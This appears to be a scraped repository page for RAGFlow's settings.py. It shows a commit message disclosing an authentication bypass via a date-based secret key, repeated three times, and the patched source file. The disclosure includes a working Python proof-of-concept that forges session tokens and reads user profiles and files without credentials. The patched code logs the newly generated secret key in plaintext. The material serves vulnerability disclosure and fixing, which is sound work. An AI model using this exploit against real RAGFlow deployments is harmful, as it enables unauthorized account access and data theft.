You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>
5 月之前
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>
5 月之前
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>
5 月之前
Feat: Adds OpenSearch2.19.1 as the vector_database support (#7140) ### What problem does this PR solve? This PR adds the support for latest OpenSearch2.19.1 as the store engine & search engine option for RAGFlow. ### Main Benefit 1. OpenSearch2.19.1 is licensed under the [Apache v2.0 License] which is much better than Elasticsearch 2. For search, OpenSearch2.19.1 supports full-text search、vector_search、hybrid_search those are similar with Elasticsearch on schema 3. For store, OpenSearch2.19.1 stores text、vector those are quite simliar with Elasticsearch on schema ### Changes - Support opensearch_python_connetor. I make a lot of adaptions since the schema and api/method between ES and Opensearch differs in many ways(especially the knn_search has a significant gap) : rag/utils/opensearch_coon.py - Support static config adaptions by changing: conf/service_conf.yaml、api/settings.py、rag/settings.py - Supprt some store&search schema changes between OpenSearch and ES: conf/os_mapping.json - Support OpenSearch python sdk : pyproject.toml - Support docker config for OpenSearch2.19.1 : docker/.env、docker/docker-compose-base.yml、docker/service_conf.yaml.template ### How to use - I didn't change the priority that ES as the default doc/search engine. Only if in docker/.env , we set DOC_ENGINE=${DOC_ENGINE:-opensearch}, it will work. ### Others Our team tested a lot of docs in our environment by using OpenSearch as the vector database ,it works very well. All the conifg for OpenSearch is necessary. ### Type of change - [x] New Feature (non-breaking change which adds functionality) --------- Co-authored-by: Yongteng Lei <yongtengrey@outlook.com> Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com> Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
6 月之前
Feat: Adds OpenSearch2.19.1 as the vector_database support (#7140) ### What problem does this PR solve? This PR adds the support for latest OpenSearch2.19.1 as the store engine & search engine option for RAGFlow. ### Main Benefit 1. OpenSearch2.19.1 is licensed under the [Apache v2.0 License] which is much better than Elasticsearch 2. For search, OpenSearch2.19.1 supports full-text search、vector_search、hybrid_search those are similar with Elasticsearch on schema 3. For store, OpenSearch2.19.1 stores text、vector those are quite simliar with Elasticsearch on schema ### Changes - Support opensearch_python_connetor. I make a lot of adaptions since the schema and api/method between ES and Opensearch differs in many ways(especially the knn_search has a significant gap) : rag/utils/opensearch_coon.py - Support static config adaptions by changing: conf/service_conf.yaml、api/settings.py、rag/settings.py - Supprt some store&search schema changes between OpenSearch and ES: conf/os_mapping.json - Support OpenSearch python sdk : pyproject.toml - Support docker config for OpenSearch2.19.1 : docker/.env、docker/docker-compose-base.yml、docker/service_conf.yaml.template ### How to use - I didn't change the priority that ES as the default doc/search engine. Only if in docker/.env , we set DOC_ENGINE=${DOC_ENGINE:-opensearch}, it will work. ### Others Our team tested a lot of docs in our environment by using OpenSearch as the vector database ,it works very well. All the conifg for OpenSearch is necessary. ### Type of change - [x] New Feature (non-breaking change which adds functionality) --------- Co-authored-by: Yongteng Lei <yongtengrey@outlook.com> Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com> Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
6 月之前
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212
  1. #
  2. # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
  3. #
  4. # Licensed under the Apache License, Version 2.0 (the "License");
  5. # you may not use this file except in compliance with the License.
  6. # You may obtain a copy of the License at
  7. #
  8. # http://www.apache.org/licenses/LICENSE-2.0
  9. #
  10. # Unless required by applicable law or agreed to in writing, software
  11. # distributed under the License is distributed on an "AS IS" BASIS,
  12. # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  13. # See the License for the specific language governing permissions and
  14. # limitations under the License.
  15. #
  16. import json
  17. import os
  18. import secrets
  19. from datetime import date
  20. from enum import Enum, IntEnum
  21. import rag.utils
  22. import rag.utils.es_conn
  23. import rag.utils.infinity_conn
  24. import rag.utils.opensearch_conn
  25. from api.constants import RAG_FLOW_SERVICE_NAME
  26. from api.utils import decrypt_database_config, get_base_config
  27. from api.utils.file_utils import get_project_base_directory
  28. from rag.nlp import search
  29. LIGHTEN = int(os.environ.get("LIGHTEN", "0"))
  30. LLM = None
  31. LLM_FACTORY = None
  32. LLM_BASE_URL = None
  33. CHAT_MDL = ""
  34. EMBEDDING_MDL = ""
  35. RERANK_MDL = ""
  36. ASR_MDL = ""
  37. IMAGE2TEXT_MDL = ""
  38. API_KEY = None
  39. PARSERS = None
  40. HOST_IP = None
  41. HOST_PORT = None
  42. SECRET_KEY = None
  43. FACTORY_LLM_INFOS = None
  44. DATABASE_TYPE = os.getenv("DB_TYPE", "mysql")
  45. DATABASE = decrypt_database_config(name=DATABASE_TYPE)
  46. # authentication
  47. AUTHENTICATION_CONF = None
  48. # client
  49. CLIENT_AUTHENTICATION = None
  50. HTTP_APP_KEY = None
  51. GITHUB_OAUTH = None
  52. FEISHU_OAUTH = None
  53. OAUTH_CONFIG = None
  54. DOC_ENGINE = None
  55. docStoreConn = None
  56. retrievaler = None
  57. kg_retrievaler = None
  58. # user registration switch
  59. REGISTER_ENABLED = 1
  60. # sandbox-executor-manager
  61. SANDBOX_ENABLED = 0
  62. SANDBOX_HOST = None
  63. STRONG_TEST_COUNT = int(os.environ.get("STRONG_TEST_COUNT", "32"))
  64. BUILTIN_EMBEDDING_MODELS = ["BAAI/bge-large-zh-v1.5@BAAI", "maidalun1020/bce-embedding-base_v1@Youdao"]
  65. def get_or_create_secret_key():
  66. secret_key = os.environ.get("RAGFLOW_SECRET_KEY")
  67. if secret_key and len(secret_key) >= 32:
  68. return secret_key
  69. # Check if there's a configured secret key
  70. configured_key = get_base_config(RAG_FLOW_SERVICE_NAME, {}).get("secret_key")
  71. if configured_key and configured_key != str(date.today()) and len(configured_key) >= 32:
  72. return configured_key
  73. # Generate a new secure key and warn about it
  74. import logging
  75. new_key = secrets.token_hex(32)
  76. logging.warning(
  77. "SECURITY WARNING: Using auto-generated SECRET_KEY. "
  78. f"Generated key: {new_key}"
  79. )
  80. return new_key
  81. def init_settings():
  82. global LLM, LLM_FACTORY, LLM_BASE_URL, LIGHTEN, DATABASE_TYPE, DATABASE, FACTORY_LLM_INFOS, REGISTER_ENABLED
  83. LIGHTEN = int(os.environ.get("LIGHTEN", "0"))
  84. DATABASE_TYPE = os.getenv("DB_TYPE", "mysql")
  85. DATABASE = decrypt_database_config(name=DATABASE_TYPE)
  86. LLM = get_base_config("user_default_llm", {})
  87. LLM_DEFAULT_MODELS = LLM.get("default_models", {})
  88. LLM_FACTORY = LLM.get("factory")
  89. LLM_BASE_URL = LLM.get("base_url")
  90. try:
  91. REGISTER_ENABLED = int(os.environ.get("REGISTER_ENABLED", "1"))
  92. except Exception:
  93. pass
  94. try:
  95. with open(os.path.join(get_project_base_directory(), "conf", "llm_factories.json"), "r") as f:
  96. FACTORY_LLM_INFOS = json.load(f)["factory_llm_infos"]
  97. except Exception:
  98. FACTORY_LLM_INFOS = []
  99. global CHAT_MDL, EMBEDDING_MDL, RERANK_MDL, ASR_MDL, IMAGE2TEXT_MDL
  100. if not LIGHTEN:
  101. EMBEDDING_MDL = BUILTIN_EMBEDDING_MODELS[0]
  102. if LLM_DEFAULT_MODELS:
  103. CHAT_MDL = LLM_DEFAULT_MODELS.get("chat_model", CHAT_MDL)
  104. EMBEDDING_MDL = LLM_DEFAULT_MODELS.get("embedding_model", EMBEDDING_MDL)
  105. RERANK_MDL = LLM_DEFAULT_MODELS.get("rerank_model", RERANK_MDL)
  106. ASR_MDL = LLM_DEFAULT_MODELS.get("asr_model", ASR_MDL)
  107. IMAGE2TEXT_MDL = LLM_DEFAULT_MODELS.get("image2text_model", IMAGE2TEXT_MDL)
  108. # factory can be specified in the config name with "@". LLM_FACTORY will be used if not specified
  109. CHAT_MDL = CHAT_MDL + (f"@{LLM_FACTORY}" if "@" not in CHAT_MDL and CHAT_MDL != "" else "")
  110. EMBEDDING_MDL = EMBEDDING_MDL + (f"@{LLM_FACTORY}" if "@" not in EMBEDDING_MDL and EMBEDDING_MDL != "" else "")
  111. RERANK_MDL = RERANK_MDL + (f"@{LLM_FACTORY}" if "@" not in RERANK_MDL and RERANK_MDL != "" else "")
  112. ASR_MDL = ASR_MDL + (f"@{LLM_FACTORY}" if "@" not in ASR_MDL and ASR_MDL != "" else "")
  113. IMAGE2TEXT_MDL = IMAGE2TEXT_MDL + (f"@{LLM_FACTORY}" if "@" not in IMAGE2TEXT_MDL and IMAGE2TEXT_MDL != "" else "")
  114. global API_KEY, PARSERS, HOST_IP, HOST_PORT, SECRET_KEY
  115. API_KEY = LLM.get("api_key")
  116. PARSERS = LLM.get(
  117. "parsers", "naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One,audio:Audio,email:Email,tag:Tag"
  118. )
  119. HOST_IP = get_base_config(RAG_FLOW_SERVICE_NAME, {}).get("host", "127.0.0.1")
  120. HOST_PORT = get_base_config(RAG_FLOW_SERVICE_NAME, {}).get("http_port")
  121. SECRET_KEY = get_or_create_secret_key()
  122. global AUTHENTICATION_CONF, CLIENT_AUTHENTICATION, HTTP_APP_KEY, GITHUB_OAUTH, FEISHU_OAUTH, OAUTH_CONFIG
  123. # authentication
  124. AUTHENTICATION_CONF = get_base_config("authentication", {})
  125. # client
  126. CLIENT_AUTHENTICATION = AUTHENTICATION_CONF.get("client", {}).get("switch", False)
  127. HTTP_APP_KEY = AUTHENTICATION_CONF.get("client", {}).get("http_app_key")
  128. GITHUB_OAUTH = get_base_config("oauth", {}).get("github")
  129. FEISHU_OAUTH = get_base_config("oauth", {}).get("feishu")
  130. OAUTH_CONFIG = get_base_config("oauth", {})
  131. global DOC_ENGINE, docStoreConn, retrievaler, kg_retrievaler
  132. DOC_ENGINE = os.environ.get("DOC_ENGINE", "elasticsearch")
  133. # DOC_ENGINE = os.environ.get('DOC_ENGINE', "opensearch")
  134. lower_case_doc_engine = DOC_ENGINE.lower()
  135. if lower_case_doc_engine == "elasticsearch":
  136. docStoreConn = rag.utils.es_conn.ESConnection()
  137. elif lower_case_doc_engine == "infinity":
  138. docStoreConn = rag.utils.infinity_conn.InfinityConnection()
  139. elif lower_case_doc_engine == "opensearch":
  140. docStoreConn = rag.utils.opensearch_conn.OSConnection()
  141. else:
  142. raise Exception(f"Not supported doc engine: {DOC_ENGINE}")
  143. retrievaler = search.Dealer(docStoreConn)
  144. from graphrag import search as kg_search
  145. kg_retrievaler = kg_search.KGSearch(docStoreConn)
  146. if int(os.environ.get("SANDBOX_ENABLED", "0")):
  147. global SANDBOX_HOST
  148. SANDBOX_HOST = os.environ.get("SANDBOX_HOST", "sandbox-executor-manager")
  149. class CustomEnum(Enum):
  150. @classmethod
  151. def valid(cls, value):
  152. try:
  153. cls(value)
  154. return True
  155. except BaseException:
  156. return False
  157. @classmethod
  158. def values(cls):
  159. return [member.value for member in cls.__members__.values()]
  160. @classmethod
  161. def names(cls):
  162. return [member.name for member in cls.__members__.values()]
  163. class RetCode(IntEnum, CustomEnum):
  164. SUCCESS = 0
  165. NOT_EFFECTIVE = 10
  166. EXCEPTION_ERROR = 100
  167. ARGUMENT_ERROR = 101
  168. DATA_ERROR = 102
  169. OPERATING_ERROR = 103
  170. CONNECTION_ERROR = 105
  171. RUNNING = 106
  172. PERMISSION_ERROR = 108
  173. AUTHENTICATION_ERROR = 109
  174. UNAUTHORIZED = 401
  175. SERVER_ERROR = 500
  176. FORBIDDEN = 403
  177. NOT_FOUND = 404